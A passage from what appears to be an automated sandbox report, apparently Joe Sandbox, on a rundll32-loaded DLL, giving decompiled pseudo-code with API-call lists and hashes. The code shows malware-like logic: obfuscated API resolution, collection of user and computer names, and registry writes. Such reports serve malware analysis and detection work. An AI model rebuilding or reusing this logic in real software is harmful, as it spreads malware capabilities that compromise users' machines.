						_t5 = _t30 + 0x4fde756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4fdd2a4; // 0x254a5a8
							_t7 = _t33 + 0x4fde40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4fdd2a4; // 0x254a5a8
								_t9 = _t36 + 0x4fde4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4fdd2a4; // 0x254a5a8
									_t11 = _t39 + 0x4fde779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04FD7B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x04fd57e7
                                          0x04fd57eb
                                          0x04fd58ad
                                          0x04fd57f1
                                          0x04fd57f1
                                          0x04fd57f6
                                          0x04fd5809
                                          0x04fd580b
                                          0x04fd5810
                                          0x04fd5818
                                          0x04fd581f
                                          0x04fd5821
                                          0x04fd5826
                                          0x04fd58a5
                                          0x04fd58a6
                                          0x04fd5828
                                          0x04fd5828
                                          0x04fd582d
                                          0x04fd5835
                                          0x04fd5837
                                          0x04fd583c
                                          0x00000000
                                          0x04fd583e
                                          0x04fd583e
                                          0x04fd5843
                                          0x04fd584b
                                          0x04fd584d
                                          0x04fd5852
                                          0x00000000
                                          0x04fd5854
                                          0x04fd5854
                                          0x04fd5859
                                          0x04fd5861
                                          0x04fd5863
                                          0x04fd5868
                                          0x00000000
                                          0x04fd586a
                                          0x04fd586a
                                          0x04fd586f
                                          0x04fd5877
                                          0x04fd5879
                                          0x04fd587e
                                          0x00000000
                                          0x04fd5880
                                          0x04fd5886
                                          0x04fd588b
                                          0x04fd5892
                                          0x04fd5897
                                          0x04fd589c
                                          0x00000000
                                          0x04fd589e
                                          0x04fd58a1
                                          0x04fd58a1
                                          0x04fd589c
                                          0x04fd587e
                                          0x04fd5868
                                          0x04fd5852
                                          0x04fd583c
                                          0x04fd5826
                                          0x04fd58bb

                                          APIs
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04FD14AF,?,?,?,?,00000000,00000000), ref: 04FD57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04FD581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04FD5835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04FD584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04FD5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04FD5877
                                            • Part of subcall function 04FD7B01: memset.NTDLL ref: 04FD7B80
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: 4eabc64bbbff5d9eb4b26d458c843790a48f89c7bea9b0003b69f757ea0c5aca
                                          • Instruction ID: 72b57a6655f1d05c1e2fdd02c589a6b1d4311d1170150050ba32c70eb8593ff0
                                          • Opcode Fuzzy Hash: 4eabc64bbbff5d9eb4b26d458c843790a48f89c7bea9b0003b69f757ea0c5aca
                                          • Instruction Fuzzy Hash: 072171B1A0270AEFEB10EFB9D844D5AB7EEEF443047085529E548DB250EB74F906CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FDA642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04FDA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x4fdd33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E04FDA5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E04FD621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E04FD147E(_a8);
						goto L29;
					}
					_t65 =  *0x4fdd2a4; // 0x254a5a8
					_t16 = _t65 + 0x4fde8de; // 0x65696c43
					_t68 = E04FDA5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d04fdc0
						if(E04FD4C9A( *_t33, _t96, _a8,  *0x4fdd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4fdd2a4; // 0x254a5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x4fdea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4fdea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E04FD30FC( &_a24, _t73,  *0x4fdd334,  *0x4fdd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x4fdd2a4; // 0x254a5a8
									_t44 = _t75 + 0x4fde856; // 0x74666f53
									_t78 = E04FDA5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d04fdc0
										E04FD1BC1( *_t47, _t96, _a8,  *0x4fdd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d04fdc0
										E04FD1BC1( *_t49, _t96, _t103,  *0x4fdd330, _a16);
										E04FD147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d04fdc0
									E04FD1BC1( *_t40, _t96, _a8,  *0x4fdd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d04fdc0
									E04FD1BC1( *_t43, _t96, _a8,  *0x4fdd330, _a16);
								}
								if( *_t105 != 0) {
									E04FD147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d04fdc0
					if(E04FD74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d04fdc0
							E04FD4C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E04FD147E(_t104);
						_t102 = _a16;
					}
					E04FD147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x4fdd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x04fda642
                                          0x04fda64b
                                          0x04fda652
                                          0x04fda657
                                          0x04fda6c6
                                          0x04fda6cc
                                          0x04fda6d1
                                          0x04fda6da
                                          0x04fda6df
                                          0x04fda6e4
                                          0x04fda858
                                          0x04fda85f
                                          0x04fda85f
                                          0x04fda864
                                          0x04fda866
                                          0x04fda866
                                          0x04fda86f
                                          0x04fda86f
                                          0x04fda6ea
                                          0x04fda6f6
                                          0x04fda84e
                                          0x04fda851
                                          0x00000000
                                          0x04fda851
                                          0x04fda6fc
                                          0x04fda701
                                          0x04fda70a
                                          0x04fda70f
                                          0x04fda714
                                          0x04fda75e
                                          0x04fda75e
                                          0x04fda771
                                          0x04fda77b
                                          0x04fda781
                                          0x04fda788
                                          0x04fda792
                                          0x04fda792
                                          0x04fda78a
                                          0x04fda78a
                                          0x04fda78a
                                          0x04fda78a
                                          0x04fda7b4
                                          0x04fda7bc
                                          0x04fda7ea
                                          0x04fda7ef
                                          0x04fda7f8
                                          0x04fda7fd
                                          0x04fda801
                                          0x04fda833
                                          0x04fda803
                                          0x04fda810
                                          0x04fda813
                                          0x04fda823
                                          0x04fda826
                                          0x04fda82c
                                          0x04fda82c
                                          0x04fda7be
                                          0x04fda7cb
                                          0x04fda7ce
                                          0x04fda7e0
                                          0x04fda7e3
                                          0x04fda7e3
                                          0x04fda83d
                                          0x04fda849
                                          0x04fda83f
                                          0x04fda842
                                          0x04fda842
                                          0x04fda83d
                                          0x04fda7b4
                                          0x00000000
                                          0x04fda77b
                                          0x04fda723
                                          0x04fda72d
                                          0x04fda72f
                                          0x04fda734
                                          0x04fda738
                                          0x04fda73a
                                          0x04fda745
                                          0x04fda748
                                          0x04fda748
                                          0x04fda74e
                                          0x04fda753
                                          0x04fda753
                                          0x04fda759
                                          0x00000000
                                          0x04fda759
                                          0x04fda65c
                                          0x00000000
                                          0x04fda683
                                          0x04fda68e
                                          0x04fda6a4
                                          0x04fda6aa
                                          0x04fda6b2
                                          0x00000000
                                          0x04fda6b2

                                          APIs
                                          • StrChrA.SHLWAPI(04FD553C,0000005F,00000000,00000000,00000104), ref: 04FDA675
                                          • memcpy.NTDLL(?,04FD553C,?), ref: 04FDA68E
                                          • lstrcpy.KERNEL32(?), ref: 04FDA6A4
                                            • Part of subcall function 04FDA5E9: lstrlen.KERNEL32(?,00000000,04FDD330,00000001,04FD937A,04FDD00C,04FDD00C,00000000,00000005,00000000,00000000,?,?,?,04FD207E,?), ref: 04FDA5F2
                                            • Part of subcall function 04FDA5E9: mbstowcs.NTDLL ref: 04FDA619
                                            • Part of subcall function 04FDA5E9: memset.NTDLL ref: 04FDA62B
                                            • Part of subcall function 04FD1BC1: lstrlenW.KERNEL32(04FD553C,?,?,04FDA818,3D04FDC0,80000002,04FD553C,04FD9642,74666F53,4D4C4B48,04FD9642,?,3D04FDC0,80000002,04FD553C,?), ref: 04FD1BE1
                                            • Part of subcall function 04FD147E: HeapFree.KERNEL32(00000000,00000000,04FD1D11,00000000,?,?,-00000008), ref: 04FD148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04FDA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 8fae2af3d037a52e805b0851f99ec373deb0569c3e7f1651d5b66529ff1a0fd5
                                          • Instruction ID: f1adbe6acd51c5d28d12bc2e3964ff4dcf97de280d4db1d770ec1c8ec3718710
                                          • Opcode Fuzzy Hash: 8fae2af3d037a52e805b0851f99ec373deb0569c3e7f1651d5b66529ff1a0fd5
                                          • Instruction Fuzzy Hash: 05510E7290020AEFEF12AFA0ED44E9A77BBEF05304F088529F91596160E739E917DB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04FD58BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04FD147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4fd5210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04fd6158
                                          0x04fd615b
                                          0x04fd615e
                                          0x04fd6164
                                          0x04fd6169
                                          0x04fd616f
                                          0x04fd6177
                                          0x04fd617a
                                          0x04fd6180
                                          0x04fd6185
                                          0x04fd6192
                                          0x04fd619f
                                          0x04fd61a3
                                          0x04fd61a5
                                          0x04fd61a9
                                          0x04fd61ac
                                          0x04fd61bc
                                          0x04fd620f
                                          0x04fd6210
                                          0x04fd61be
                                          0x04fd61c3
                                          0x04fd61c4
                                          0x04fd61c9
                                          0x04fd61cc
                                          0x04fd61df
                                          0x00000000
                                          0x04fd61e1
                                          0x04fd61e4
                                          0x04fd61e9
                                          0x04fd61f7
                                          0x04fd61fa
                                          0x04fd6200
                                          0x04fd6205
                                          0x00000000
                                          0x04fd6207
                                          0x04fd6207
                                          0x04fd620a
                                          0x04fd620a
                                          0x04fd6205
                                          0x04fd61df
                                          0x04fd6215
                                          0x04fd6216
                                          0x04fd6185
                                          0x04fd621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04FD520E), ref: 04FD615E
                                          • GetComputerNameW.KERNEL32(00000000,04FD520E), ref: 04FD617A
                                            • Part of subcall function 04FD58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04FD1C51), ref: 04FD58CA
                                          • GetUserNameW.ADVAPI32(00000000,04FD520E), ref: 04FD61B4
                                          • GetComputerNameW.KERNEL32(04FD520E,?), ref: 04FD61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04FD520E,00000000,04FD5210,00000000,00000000,?,?,04FD520E), ref: 04FD61FA
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 66d86809d97fbdcd01b60fd6b5a91c51a7452ef8e399270902d8dc696768ef92
                                          • Instruction ID: 08437082fc7d72008a89308a0c9c3dde83b35dd0766c3a7659a5d2078d6dc29e
                                          • Opcode Fuzzy Hash: 66d86809d97fbdcd01b60fd6b5a91c51a7452ef8e399270902d8dc696768ef92
                                          • Instruction Fuzzy Hash: 1B21B8B6D41208FFDB11DFE5D9889AEBBBEEF44304B5444AAE501E7200E634AB45DB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD62CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04FD62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x4fdd114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x4fdd238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x04fd62d5
                                          0x04fd62d8
                                          0x04fd62da
                                          0x04fd62e3
                                          0x04fd62f5
                                          0x04fd62f5
                                          0x04fd62f9
                                          0x04fd62fb
                                          0x04fd62fe
                                          0x04fd6301
                                          0x04fd630a
                                          0x04fd6314
                                          0x04fd6318
                                          0x04fd631d
                                          0x04fd6333
                                          0x04fd6337
                                          0x04fd6388
                                          0x04fd6339
                                          0x04fd6339
                                          0x04fd6341
                                          0x04fd6350
                                          0x04fd6355
                                          0x04fd6365
                                          0x04fd636b
                                          0x04fd6376
                                          0x04fd6380
                                          0x04fd6384
                                          0x04fd6384
                                          0x04fd6337
                                          0x04fd638f
                                          0x04fd6396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04FD6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04FD632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04FD6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04FD6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04FD636B
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
                                          • API String ID: 1819133394-0
                                          • Opcode ID: 69d6f70a1b1260c141680286e5ed8f22f90324d368d8a33d28e4fe51b1cc6e9c
                                          • Instruction ID: 6f7ed6422076e99df25cef0bd441e2f72bdd86ead40dda1bf9277b2bb3f48974
                                          • Opcode Fuzzy Hash: 69d6f70a1b1260c141680286e5ed8f22f90324d368d8a33d28e4fe51b1cc6e9c
                                          • Instruction Fuzzy Hash: 52219076900249AFDF019FA9C844ADEBF7AEF85304F098055EC44AB304C735E916CBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD9FE7, Relevance: 7.5, APIs: 5, Instructions: 45COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04FD9FE7(void* __eax, intOrPtr _a4, intOrPtr _a8) {
				void* __esi;
				long _t10;
				void* _t18;
				void* _t22;

				_t9 = __eax;
				_t22 = __eax;
				if(_a4 != 0 && E04FD6B6E(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
					L9:
					return GetLastError();
				}
				_t10 = E04FDA96C(_t9, _t18, _t22, _a8);
				if(_t10 == 0) {
					ResetEvent( *(_t22 + 0x1c));
					ResetEvent( *(_t22 + 0x20));
					_push(0);
					_push(0);
					_push(0xffffffff);
					_push(0);
					_push( *((intOrPtr*)(_t22 + 0x18)));
					if( *0x4fdd12c() != 0) {
						SetEvent( *(_t22 + 0x1c));
						goto L7;
					} else {
						_t10 = GetLastError();
						if(_t10 == 0x3e5) {
							L7:
							_t10 = 0;
						}
					}
				}
				if(_t10 == 0xffffffff) {
					goto L9;
				}
				return _t10;
			}







                                          0x04fd9fe7
                                          0x04fd9ff4
                                          0x04fd9ff6
                                          0x04fda059
                                          0x00000000
                                          0x04fda059
                                          0x04fda00e
                                          0x04fda015
                                          0x04fda021
                                          0x04fda026
                                          0x04fda028
                                          0x04fda02a
                                          0x04fda02c
                                          0x04fda02e
                                          0x04fda030
                                          0x04fda03c
                                          0x04fda04c
                                          0x00000000
                                          0x04fda03e
                                          0x04fda03e
                                          0x04fda045
                                          0x04fda052
                                          0x04fda052
                                          0x04fda052
                                          0x04fda045
                                          0x04fda03c
                                          0x04fda057
                                          0x00000000
                                          0x00000000
                                          0x04fda05d

                                          APIs
                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA021
                                          • ResetEvent.KERNEL32(?), ref: 04FDA026
                                          • GetLastError.KERNEL32 ref: 04FDA03E
                                          • GetLastError.KERNEL32(?,?,00000102,04FD66AF,?,?,00000000,00000000), ref: 04FDA059
                                            • Part of subcall function 04FD6B6E: lstrlen.KERNEL32(00000000,00000008,?,75144D40,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?,?,00000000), ref: 04FD6B7A
                                            • Part of subcall function 04FD6B6E: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04FDA006,?,?,?,?,00000102,04FD66AF,?), ref: 04FD6BD8
                                            • Part of subcall function 04FD6B6E: lstrcpy.KERNEL32(00000000,00000000), ref: 04FD6BE8
                                          • SetEvent.KERNEL32(?), ref: 04FDA04C
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                          • String ID:
                                          • API String ID: 1449191863-0
                                          • Opcode ID: 41c0d401d52f84321d03a65e2ff66f37782a1edd4d88e1db27598692421a6961
                                          • Instruction ID: f920f33c3d17427263b42fab5f06127073c8415e164634a2d3f2345554379bd2
                                          • Opcode Fuzzy Hash: 41c0d401d52f84321d03a65e2ff66f37782a1edd4d88e1db27598692421a6961
                                          • Instruction Fuzzy Hash: 4A01A231900200ABEB316E70DC48F5BB7A7FF44764F184A24F651D10E0D725F816E669
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD6A7F, Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04FD6A7F(intOrPtr _a4) {
				void* _t2;
				unsigned int _t4;
				void* _t5;
				long _t6;
				void* _t7;
				void* _t15;

				_t2 = CreateEventA(0, 1, 0, 0);
				 *0x4fdd26c = _t2;
				if(_t2 == 0) {
					return GetLastError();
				}
				_t4 = GetVersion();
				if(_t4 != 5) {
					L4:
					if(_t15 <= 0) {
						_t5 = 0x32;
						return _t5;
					}
					L5:
					 *0x4fdd25c = _t4;
					_t6 = GetCurrentProcessId();
					 *0x4fdd258 = _t6;
					 *0x4fdd264 = _a4;
					_t7 = OpenProcess(0x10047a, 0, _t6);
					 *0x4fdd254 = _t7;
					if(_t7 == 0) {
						 *0x4fdd254 =  *0x4fdd254 | 0xffffffff;
					}
					return 0;
				}
				if(_t4 >> 8 > 0) {
					goto L5;
				}
				_t15 = _t4 - _t4;
				goto L4;
			}









                                          0x04fd6a87
                                          0x04fd6a8d
                                          0x04fd6a94
                                          0x00000000
                                          0x04fd6aee
                                          0x04fd6a96
                                          0x04fd6a9e
                                          0x04fd6aab
                                          0x04fd6aab
                                          0x04fd6aeb
                                          0x00000000
                                          0x04fd6aeb
                                          0x04fd6aad
                                          0x04fd6aad
                                          0x04fd6ab2
                                          0x04fd6ac4
                                          0x04fd6ac9
                                          0x04fd6acf
                                          0x04fd6ad5
                                          0x04fd6adc
                                          0x04fd6ade
                                          0x04fd6ade
                                          0x00000000
                                          0x04fd6ae5
                                          0x04fd6aa7
                                          0x00000000
                                          0x00000000
                                          0x04fd6aa9
                                          0x00000000

                                          APIs
                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04FD90D2,?), ref: 04FD6A87
                                          • GetVersion.KERNEL32 ref: 04FD6A96
                                          • GetCurrentProcessId.KERNEL32 ref: 04FD6AB2
                                          • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04FD6ACF
                                          • GetLastError.KERNEL32 ref: 04FD6AEE
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.363739858.0000000004FD1000.00000020.00020000.sdmp, Offset: 04FD0000, based on PE: true
                                          • Associated: 00000015.00000002.363728082.0000000004FD0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363758849.0000000004FDC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363768757.0000000004FDD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000015.00000002.363781338.0000000004FDF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_4fd0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                          • String ID:
                                          • API String ID: 2270775618-0
                                          • Opcode ID: 824d31b2dc86a3759c7fe6cac995c85cfd60e8f2ad2ad1e4ed706a3a2f1df065
                                          • Instruction ID: ba1fafeae8dd3033ade5bd1421fc991e8836dcf85ecd6d73542d858c8f0ca554
                                          • Opcode Fuzzy Hash: 824d31b2dc86a3759c7fe6cac995c85cfd60e8f2ad2ad1e4ed706a3a2f1df065
                                          • Instruction Fuzzy Hash: 5AF0AF70A4234A9BFB219F74BC09B153B63E744702F04811AF582C61C0E778E852CB16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04FD91B5, Relevance: 6.2, APIs: 4, Instructions: 154memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 46%
                                          			E04FD91B5(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				short _t67;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr* _t83;
				intOrPtr* _t87;
				intOrPtr _t103;
				intOrPtr _t109;
				void* _t118;
				void* _t122;
				void* _t123;
				intOrPtr _t130;

				_t123 = _t122 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t118 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t118 >= 0) {
					_t54 = _v8;
					_t103 =  *0x4fdd2a4; // 0x254a5a8
					_t5 = _t103 + 0x4fde038; // 0x3050f485
					_t118 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
